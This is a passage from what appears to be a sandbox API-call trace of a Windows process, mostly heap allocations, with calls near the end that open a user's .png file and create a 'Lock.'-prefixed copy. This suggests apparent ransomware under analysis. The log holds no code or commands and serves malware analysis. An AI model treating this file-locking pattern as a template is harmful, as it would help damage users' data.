lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0206.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0206.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0206.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.819] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0206.820] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0206.820] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.821] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.822] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.822] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.823] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.823] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0206.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.823] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.823] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0206.823] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0206.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0206.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0206.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.824] CryptDestroyHash (hHash=0xaa5820) returned 1 [0206.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0206.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0206.824] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.826] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/uKUOp3ady.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ukuop3ady.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0206.826] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.826] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0206.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0206.827] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.827] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.827] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.827] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0206.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0206.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.828] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.uKUOp3ady.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.ukuop3ady.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0206.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0206.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0206.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.829] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0206.829] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0206.829] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.829] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.830] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0206.830] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0206.832] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x7d25, lpOverlapped=0x0) returned 1 [0206.833] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0206.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0206.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0206.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0206.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0206.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 